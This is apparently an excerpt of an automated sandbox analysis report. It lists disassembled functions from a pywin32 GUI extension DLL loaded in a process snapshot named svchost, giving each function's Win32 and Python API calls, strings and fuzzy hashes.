                            0x6daa7952
                            0x6daa7957
                            0x6daa795e
                            0x6daa796d
                            0x6daa796f
                            0x6daa7972
                            0x6daa7974
                            0x6daa7988
                            0x6daa7988
                            0x6daa798e
                            0x6daa7976
                            0x6daa797f
                            0x6daa7981
                            0x6daa7984
                            0x6daa7986
                            0x6daa798f
                            0x6daa7993
                            0x6daa7999
                            0x6daa79c4
                            0x6daa79c9
                            0x6daa79ce
                            0x6daa79d0
                            0x6daa79d3
                            0x6daa79d5
                            0x6daa79df
                            0x6daa79e5
                            0x6daa79e7
                            0x6daa79e9
                            0x6daa7a16
                            0x6daa7a1f
                            0x6daa7a21
                            0x6daa7a3f
                            0x6daa7a41
                            0x6daa7a48
                            0x6daa7a4f
                            0x6daa7a55
                            0x6daa7a58
                            0x6daa7a58
                            0x6daa7a5c
                            0x6daa7a5f
                            0x6daa7a65
                            0x6daa7a65
                            0x6daa7a69
                            0x6daa7a6c
                            0x6daa7a86
                            0x6daa7a95
                            0x6daa7a6e
                            0x6daa7a75
                            0x6daa7a84
                            0x6daa7a84
                            0x6daa79eb
                            0x6daa79ec
                            0x6daa79f8
                            0x6daa7a07
                            0x6daa7a07
                            0x6daa79d7
                            0x6daa79dc
                            0x6daa79dc
                            0x6daa799b
                            0x6daa799b
                            0x6daa799e
                            0x6daa79a5
                            0x00000000
                            0x6daa79a7
                            0x6daa79aa
                            0x6daa79b6
                            0x6daa79c3
                            0x6daa79c3
                            0x6daa79a5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x6daa7986
                            0x6daa795c
                            0x6daa795c
                            0x6daa795c

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO|O,?,?,?,?,6E294CE8), ref: 6DAA794C
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA796D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA797F
                            Strings
                            • DialogBoxIndirect, xrefs: 6DAA7A70
                            • optional param must be None, or an integer (got %s), xrefs: 6DAA79AF
                            • OOOO|O, xrefs: 6DAA7943
                            • GlobalLock (for template), xrefs: 6DAA79F3
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DialogBoxIndirect$GlobalLock (for template)$OOOO|O$optional param must be None, or an integer (got %s)
                            • API String ID: 1248562531-206595987
                            • Opcode ID: ce981dc3a2b15f89b760ae70f9bb582e74a0644a461bb87ba0159bb245095a04
                            • Instruction ID: 8f5d7110f793f77ba8bee46b3fac53c9c75e84a6ff0636414b27fe333b2bffed
                            • Opcode Fuzzy Hash: ce981dc3a2b15f89b760ae70f9bb582e74a0644a461bb87ba0159bb245095a04
                            • Instruction Fuzzy Hash: 7641C33590C205AFCB01DF68DC84ABB77B8FF81215F484766F94582122E731DA5B8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB64B0, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 120threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:BeginPaint), ref: 6DAB64C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB64E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB64F2
                            • SetLastError.KERNEL32(00000000), ref: 6DAB64FC
                            • BeginPaint.USER32(?,?), ref: 6DAB650B
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6514
                            • GetLastError.KERNEL32 ref: 6DAB6521
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(BeginPaint,00000000), ref: 6DAB6531
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_BeginError@@Object_PaintParseRestoreSaveTupleWin_
                            • String ID: (Nl(iiii)llN)$BeginPaint$O:BeginPaint
                            • API String ID: 984359736-897252672
                            • Opcode ID: a040fa4897dc48a2e08eaf489b611676642ed801340537fdf3790260e4c1fab7
                            • Instruction ID: c12c7a467c1d6516199c5448efeef54d8f40e16eaf705b0c015fb0352fd62575
                            • Opcode Fuzzy Hash: a040fa4897dc48a2e08eaf489b611676642ed801340537fdf3790260e4c1fab7
                            • Instruction Fuzzy Hash: 6331E6759083015FDB006B28CC99B7B3BBDEF81225F4C4624F915C6261E7359D6786A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0160, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOO:FindWindowEx,?,?,?,?,?,?), ref: 6DAB01B0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB01D1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB01E3
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000001), ref: 6DAB01F7
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAB0211
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseResourceTuple
                            • String ID: FindWindowEx$OOOO:FindWindowEx
                            • API String ID: 3978190805-4095930253
                            • Opcode ID: edeec10ebeed87ff6ec09f99b2e29fcb854b33a6dbb0ed187b99cc14f1c75da3
                            • Instruction ID: f4afef739ada744613ace57100d1f29539dc71b9b6a68c22c8834c16c31303e2
                            • Opcode Fuzzy Hash: edeec10ebeed87ff6ec09f99b2e29fcb854b33a6dbb0ed187b99cc14f1c75da3
                            • Instruction Fuzzy Hash: 1931AE7540C302AFDB009F55CD88BABBBF8FF85306F448929F99491160E771C95A9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAAC80, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,PlgBlt), ref: 6DAAAC9D
                            • PyArg_ParseTuple.PYTHON38(?,OOOiiii|Oii:PlgBlt,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAAAD09
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$OOOiiii|Oii:PlgBlt$PlgBlt$PlgBlt$Points must contain exactly 3 points.
                            • API String ID: 361908667-1229534533
                            • Opcode ID: 560331ab0d252fb061956d5d211a70d37369d7c535dd02c27a94e554d43706e5
                            • Instruction ID: 372cca1a0ca9bc8ea697274036e5647e887b5b8cfe1625e3c88ba59eb1281634
                            • Opcode Fuzzy Hash: 560331ab0d252fb061956d5d211a70d37369d7c535dd02c27a94e554d43706e5
                            • Instruction Fuzzy Hash: D9412D7250C205AFDB01DB54DC40EABBBF9BF85215F484A2AF98592120E731DA5A8B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA7110, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO,?,?), ref: 6DAA712A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA7140
                            • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA715D
                            • PyCallable_Check.PYTHON38 ref: 6DAA7176
                            • PyErr_SetString.PYTHON38(6E28ED8C,object must be callable or a dictionary), ref: 6DAA719E
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(?), ref: 6DAA71B3
                            • GetWindowLongW.USER32(?,000000FC), ref: 6DAA71C4
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA71CB
                            • Py_BuildValue.PYTHON38(6DABD204,?,00000000), ref: 6DAA71DB
                            • PyDict_SetItem.PYTHON38(00000000,00000000), ref: 6DAA71EB
                            • _Py_Dealloc.PYTHON38(00000000), ref: 6DAA71FA
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6DAA7209
                            • SetWindowLongW.USER32 ref: 6DAA7226
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA722D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Long_$FromPtr@@Void$DeallocLongWindow$Arg_BuildCallable_CheckDict_Err_ItemObject_ParseStringTupleValue
                            • String ID: OiO$object must be callable or a dictionary
                            • API String ID: 4001600079-3043360180
                            • Opcode ID: 8f5adfee5e4017ccc96abd8c8a553ee4b7c3ee2076bafe2d8dc3187b80853d5b
                            • Instruction ID: 3a69556c9bf13466d52dce569a9f0a4361ed2136dcc8b330deb1d3536f6c8ce8
                            • Opcode Fuzzy Hash: 8f5adfee5e4017ccc96abd8c8a553ee4b7c3ee2076bafe2d8dc3187b80853d5b
                            • Instruction Fuzzy Hash: 72313EB180C301AFDB019F64DC88A6B7BF9FF41255F488728F866821B1E731D966DB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAACDC0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 172COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,UpdateLayeredWindow), ref: 6DAACDDD
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,O|OOOOOkOk:UpdateLayeredWindow,6DAC7AE4,?,?,?,?,?,00000000,?,?), ref: 6DAACE6A
                            Strings
                            • UpdateLayeredWindow, xrefs: 6DAACF9C
                            • %s is not available on this platform, xrefs: 6DAACDD6
                            • UpdateLayeredWindow, xrefs: 6DAACDD1
                            • O|OOOOOkOk:UpdateLayeredWindow, xrefs: 6DAACE57
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatKeywordsParseTuple
                            • String ID: %s is not available on this platform$O|OOOOOkOk:UpdateLayeredWindow$UpdateLayeredWindow$UpdateLayeredWindow
                            • API String ID: 223827023-43977724
                            • Opcode ID: b071d7bffa05e979d23eecba446171ea9aa2f2f1f5a9d40c925ab1605f759e88
                            • Instruction ID: e36aec6a9467b0540d9c351854976aae56dec8da20ce43c4b81e21e9221e8165
                            • Opcode Fuzzy Hash: b071d7bffa05e979d23eecba446171ea9aa2f2f1f5a9d40c925ab1605f759e88
                            • Instruction Fuzzy Hash: 8351317650C305AFDB00CF64CD80A6BB7F9FB85245F484A2EF955C3210EB32D95A9B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91050, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            • PySequence_Check.PYTHON38(?), ref: 6DA91057
                            • PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PySequence_Size.PYTHON38(?), ref: 6DA91080
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6DA91090
                            • PyErr_SetString.PYTHON38(6E28EDCC,Allocating array of handles), ref: 6DA910AD
                            Strings
                            • Allocating array of handles, xrefs: 6DA910A6
                            • Handles must be a list of integers, xrefs: 6DA91069
                            • Handles must be a list of integers, xrefs: 6DA9113B
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Err_Sequence_String$CheckSizemalloc
                            • String ID: Allocating array of handles$Handles must be a list of integers$Handles must be a list of integers
                            • API String ID: 409462344-2692657032
                            • Opcode ID: 1554a1c2787f9f92bae1eaa1c0be990f0007d71c8928188082afcdf73480dea9
                            • Instruction ID: a39b004dbb299eda72f2436550cf4f7cb8cc8842a70574d724c260c6bc0989d0
                            • Opcode Fuzzy Hash: 1554a1c2787f9f92bae1eaa1c0be990f0007d71c8928188082afcdf73480dea9
                            • Instruction Fuzzy Hash: C5312C7222C3115FCB009F68EC4466A77F4EF4A326B244129F922CA290DF769455875E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB6170, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 98threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetRgnBox), ref: 6DAB6187
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB61A3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB61B2
                            • GetRgnBox.GDI32(?,?), ref: 6DAB61C3
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB61CC
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetRgnBox,00000000), ref: 6DAB61DF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: GetRgnBox$O:GetRgnBox$llll
                            • API String ID: 2386446667-3863442658
                            • Opcode ID: f8f476de4305865564d9b9d24459db0d1d7b6c0f36f32a3d704a78d60c6957f0
                            • Instruction ID: ea9796b13ee85d1be5de83a1537dea06d58d892f554d2d19da916a8ed26e1063
                            • Opcode Fuzzy Hash: f8f476de4305865564d9b9d24459db0d1d7b6c0f36f32a3d704a78d60c6957f0
                            • Instruction Fuzzy Hash: 6A21087690C2015FDB006B298C84A7B3BB9FFC5265F4C0624F84882221E731C9578AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB59A0, Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 91threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:InvalidateRect,?), ref: 6DAB59D2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB59E8
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB5A23
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers or None,InvalidateRect), ref: 6DAB5A3D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5A5C
                            • InvalidateRect.USER32(?,00000000,?), ref: 6DAB5A6D
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5A76
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InvalidateRect,00000000), ref: 6DAB5A8B
                            Strings
                            • %s: This param must be a tuple of four integers or None, xrefs: 6DAB5A36
                            • This param must be a tuple of four integers or None, xrefs: 6DAB5AAA
                            • InvalidateRect, xrefs: 6DAB5A86
                            • InvalidateRect, xrefs: 6DAB5A31
                            • OOi:InvalidateRect, xrefs: 6DAB59C9
                            • llll, xrefs: 6DAB5A1D
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Eval_ParseThreadTupleU_object@@$Err_Error@@FormatInvalidateObject_RectRestoreSaveWin_
                            • String ID: %s: This param must be a tuple of four integers or None$InvalidateRect$InvalidateRect$OOi:InvalidateRect$This param must be a tuple of four integers or None$llll
                            • API String ID: 1226199816-3145575139
                            • Opcode ID: 52095e19d9f069b6bd0617bc807a5eaad1054c32184dc885c12f2f8a6c742e71
                            • Instruction ID: 98ca1d32a60523a226a5936afbc2958fbd4e6dff966a82d3e3935955ae4adaad
                            • Opcode Fuzzy Hash: 52095e19d9f069b6bd0617bc807a5eaad1054c32184dc885c12f2f8a6c742e71
                            • Instruction Fuzzy Hash: 82317C7240C215AFDB00DB54CC94EBB7BBCBF49204F488A59F855A2161E731DA5B8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB5880, Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 88threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB58AD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB58C3
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB58FE
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers or None,ValidateRect), ref: 6DAB5918
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5937
                            • ValidateRect.USER32(?,00000000), ref: 6DAB5944
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB594D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ValidateRect,00000000), ref: 6DAB5962
                            Strings
                            • ValidateRect, xrefs: 6DAB595D
                            • %s: This param must be a tuple of four integers or None, xrefs: 6DAB5911
                            • This param must be a tuple of four integers or None, xrefs: 6DAB5981
                            • ValidateRect, xrefs: 6DAB590C
                            • OO:ValidateRect, xrefs: 6DAB589C
                            • llll, xrefs: 6DAB58F8
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Eval_ParseThreadTupleU_object@@$Err_Error@@FormatObject_RectRestoreSaveValidateWin_
                            • String ID: %s: This param must be a tuple of four integers or None$OO:ValidateRect$This param must be a tuple of four integers or None$ValidateRect$ValidateRect$llll
                            • API String ID: 1393137343-1491635705
                            • Opcode ID: 9208451d2fdb952373ce962d9aaa6f31ea194af755144693d951278a12fbdc8f
                            • Instruction ID: 99e9b92c0cb9129e6726f63326e5879124ec72d9baaf64ff7bd2ed66ae98817d
                            • Opcode Fuzzy Hash: 9208451d2fdb952373ce962d9aaa6f31ea194af755144693d951278a12fbdc8f
                            • Instruction Fuzzy Hash: 43214C3540C205AFDB00EF58CC84BBB7BFCBF45214F488659F84592122E731DA5B8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB3130, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:GetMenuItemRect,00000000,?), ref: 6DAB315A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB317B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB318D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OOi:GetMenuItemRect$llll
                            • API String ID: 1248562531-365281674
                            • Opcode ID: 4dd4a3d2c167d4efbf12f1dff028f1079cf46e84d7a78c8e5186274542055b2d
                            • Instruction ID: 747f2d2bc07c9d5fa3019bccaeca2085822457fb15205e91824a12751ba2ac2a
                            • Opcode Fuzzy Hash: 4dd4a3d2c167d4efbf12f1dff028f1079cf46e84d7a78c8e5186274542055b2d
                            • Instruction Fuzzy Hash: DE31E57650C201AFDB009B64CC84AAB7FFDFF89254F484625F98982120F731C9979B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB25D0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 103threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ClientToScreen,?), ref: 6DAB25F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2611
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB2627
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2636
                            • ClientToScreen.USER32(?,?), ref: 6DAB2647
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2650
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ClientToScreen,00000000), ref: 6DAB2663
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Eval_Object_Thread$Arg_ClientError@@ParseRestoreSaveScreenT@@@TupleUtagWin_
                            • String ID: ClientToScreen$OO:ClientToScreen
                            • API String ID: 739399495-2882902021
                            • Opcode ID: 1460b9b0d9b7e98ed23d5b5798fbb0f9758e73e7d26565bade4a6842183e348d
                            • Instruction ID: 99bedb95707a20414678d851276ce5efb9b51a2d18635352615954ff1a5e1ba2
                            • Opcode Fuzzy Hash: 1460b9b0d9b7e98ed23d5b5798fbb0f9758e73e7d26565bade4a6842183e348d
                            • Instruction Fuzzy Hash: 7A31077650C201AFDB005F28DC99B6B7BBDFF81215F884625FC09C2121E731CC6B9AA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB24A0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 103threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ScreenToClient,?), ref: 6DAB24C5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB24E1
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB24F7
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2506
                            • ScreenToClient.USER32 ref: 6DAB2517
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2520
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ScreenToClient,00000000), ref: 6DAB2533
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Eval_Object_Thread$Arg_ClientError@@ParseRestoreSaveScreenT@@@TupleUtagWin_
                            • String ID: OO:ScreenToClient$ScreenToClient
                            • API String ID: 739399495-1442369614
                            • Opcode ID: 11db2318060022def5778a8e438f907739bf01c78afb17e417f73ded4eff4928
                            • Instruction ID: a217b60f3ae15765ddeeb4eb3639d88fba27196a7be3f700067e7cb166d9e522
                            • Opcode Fuzzy Hash: 11db2318060022def5778a8e438f907739bf01c78afb17e417f73ded4eff4928
                            • Instruction Fuzzy Hash: C131F97550C201AFDB005F28DC94B6B7BB9FF81225F484625FC05C2131E735CD678A62
